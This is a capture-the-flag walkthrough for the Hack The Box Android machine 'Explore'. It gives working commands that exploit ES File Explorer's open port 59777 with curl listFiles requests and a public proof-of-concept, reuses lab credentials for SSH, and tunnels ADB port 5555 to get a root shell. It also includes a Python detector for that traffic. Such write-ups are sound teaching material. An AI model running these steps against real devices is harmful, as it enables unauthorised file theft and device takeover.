EXPLORE ANDROID MACHINE
WELCOME TO TAMILCODE
HERE ARE TRICKS AND TECHNOLOGY
So in this session we are going to see the solution, or write-up, for the Hack The Box Android machine called Explore. Since it is an Android machine, we are going to capture the user flag and the root flag. So let us start.
First of all, turn on your Hack The Box VPN to connect to the machine.
Next, load the IP in the browser. It will show "unable to connect"; don't worry, the machine is working.
Why does it show "unable to connect"?
Because it has been running on HTTPS.
Alternatively, check whether the machine is alive using ping:
STEP 1: ping 10.10.10.247
Now you get the ICMP responses back (see the picture below).
Next we are going to run a port scan. Unfortunately Nmap was painfully slow on this box, so we used RustScan instead for a fast scan. These days RustScan is the best choice for fast port scanning, so download it using the link below.
rustscan_2.0.1_amd64.deb is only for Kali Linux, Parrot OS or Ubuntu users.
If you are using another Linux distribution, please visit the official website (link below).
STEP 2: dpkg -i rustscan_2.0.1_amd64.deb
Now the tool is installed on your machine. Type rustscan -h to get the general usage of the tool.
STEP 3: rustscan -a 10.10.10.247
The -a flag denotes the IP address or host to scan.
Now you will get the result (shown in the image below).
This scan found four interesting open ports:
10.10.10.247:2222
10.10.10.247:41933
10.10.10.247:42135
10.10.10.247:59777
These are the open ports we found.
So load the IP address in the browser as in the step below.
STEP 4: 10.10.10.247:59777
Now you can access the website over HTTP on port 59777 (shown in the image below).
Analysing the ports further, the only one we are interested in is 59777. Searching Google for it, we found one interesting article (link below).
The vulnerability is the ES File Explorer open port vulnerability on port 59777.
WHAT IS ES FILE EXPLORER?
It is an Android file manager used to store videos, audio, images and other files.
So this port carries the ES File Explorer vulnerability.
WHAT IS THE VULNERABILITY IN ES FILE EXPLORER?
It is an open port vulnerability. When the user opens the application, an HTTP server is started in the background. Anyone connected to the same local network can then access the files in ES File Explorer, download them without permission, and remotely install apps on the phone without permission.
FOR CLEAR INFORMATION READ THE WEBSITE BELOW:
So I think it is clear now; let us come back to our topic.
Download the code from GitHub; the command is below.
STEP 5: git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln.git
STEP 6: cd ESFileExplorerOpenPortVuln
STEP 7: python poc.py --cmd getDeviceInfo --ip 10.10.10.247
Now you will get information about the machine; in this case you will be able to see that it has an sdcard.
So now we are going to exploit it using the curl command below (please copy and paste it). The command sends a POST request with the JSON body {"command":"listFiles"} to the /sdcard/ path of the ES File Explorer HTTP service on port 59777, and the app answers with the directory listing:
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://10.10.10.247:59777/sdcard/
BOOM!
Now you will be able to see user.txt, which is the user flag.
So now load user.txt in your browser using the URL below.
STEP 8: http://10.10.10.247:59777/sdcard/user.txt
Now you can read user.txt, the user flag.
So we have the user flag. Next, our target is the root flag.
Analysing the sdcard further, we find the DCIM folder, so now we load that folder.
Next we list the files in the DCIM folder (using the same payload):
curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://10.10.10.247:59777/sdcard/DCIM
Listing the files inside the folder, we get some images (shown in the image below).
Checking the images one by one, we find credentials in credit.jpg.
Load credit.jpg in the browser and you will see the credentials in the image.
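As an added example (not part of the original write-up), here is a small detector, in Python, that a defender could run over captured HTTP request records to spot the kind of traffic the curl commands and browser fetches above generate: JSON {"command": ...} POSTs and direct file GETs against port 59777. The record format and the sample lines are constructed for this example.

```python
import json
import re

ES_PORT = 59777  # port of the ES File Explorer HTTP service (from the write-up)

# Constructed sample records (not from the original page), one request per
# line: client_ip METHOD dest_host:port path body   ("-" when there is no body)
SAMPLE_LOG = """\
10.10.14.5 POST 10.10.10.247:59777 / {"command":"getDeviceInfo"}
10.10.14.5 POST 10.10.10.247:59777 /sdcard/ {"command":"listFiles"}
10.10.14.5 GET 10.10.10.247:59777 /sdcard/user.txt -
10.10.14.9 GET 10.10.10.247:8443 /login -
10.10.14.9 POST 10.10.10.247:8080 /api/v1 {"command":"ping"}
10.10.14.5 POST 10.10.10.247:59777 /sdcard/DCIM not-json
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+):(\d+) (\S+) (.*)$")

def es_command(body):
    """Return the command name if body is a JSON object {"command": "<name>"}."""
    try:
        obj = json.loads(body)
    except ValueError:
        return None
    if isinstance(obj, dict) and isinstance(obj.get("command"), str):
        return obj["command"]
    return None

def detect(log_text):
    """Flag requests against port 59777: rule es_command for a POST carrying
    a {"command": ...} JSON body (the interface the curl commands use) and
    rule es_file_fetch for any GET (a direct download such as /sdcard/user.txt).
    Malformed lines and traffic to other ports are ignored."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        client, method, _host, port, path, body = m.groups()
        if int(port) != ES_PORT:
            continue
        cmd = es_command(body) if method == "POST" else None
        if cmd is not None:
            alerts.append({"client": client, "rule": "es_command",
                           "detail": cmd + " " + path})
        elif method == "GET":
            alerts.append({"client": client, "rule": "es_file_fetch",
                           "detail": path})
    return alerts
```

Running detect(SAMPLE_LOG) yields three alerts, all from the same client, while the JSON "command" sent to port 8080 and the malformed body on port 59777 are left alone.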
SO THE USERNAME IS kristi AND THE PASSWORD IS Kr1sT!5h@Rp3xPl0r3!
So now we are going to log in to port 2222, which we saw in the port scan.
STEP 9: ssh -p 2222 kristi@10.10.10.247
It will ask for the password; enter Kr1sT!5h@Rp3xPl0r3!
Now you are logged in, so let us enter the data folder.
STEP 10: cd data
STEP 11: ls
It shows "permission denied".
So I researched more articles and found nothing, until at last I found one article about the ADB shell.
WHAT IS ADB SHELL?
ADB = Android Debug Bridge.
For more information see my article below.
Through the ADB shell we may be able to port-forward port 5555, as described in the article below.
So now we are going to forward port 5555 to localhost.
For your information, this is not a flaw in ADB, so you cannot do it on a non-rooted device; it is only applicable to rooted devices.
So next open a new terminal on your machine and type the command below.
STEP 11: ssh -p 2222 -L 5555:localhost:5555 kristi@10.10.10.247
It will ask for the password, so enter Kr1sT!5h@Rp3xPl0r3!
Now the port is forwarded: the SSH tunnel maps port 5555 on your localhost to port 5555 on the machine.
Next we are going to install the ADB tool.
STEP 12: sudo apt-get install android-tools-adb
Once it is installed, open a new terminal and enter the commands below.
STEP 13: adb connect localhost:5555
STEP 14: adb shell
Now you will get the shell (shown in the image below).
STEP 15: su
STEP 16: cd data
STEP 17: ls
BOOM!
Now you get root.txt, which is the root flag (shown in the image).
IF ANY ERROR CAME UP IN HACK THE BOX, CONTACT US ON TELEGRAM.
THE LINK IS HERE; FOLLOW US.
I HOPE YOU UNDERSTOOD THIS ARTICLE. PLEASE SHARE, COMMENT, LIKE AND SUBSCRIBE TO MY WEBSITE. IF YOU LIKED THE ARTICLE, PLEASE DONATE TO US USING THE LINK BELOW:
Hi anna, can you explain that curl command to me?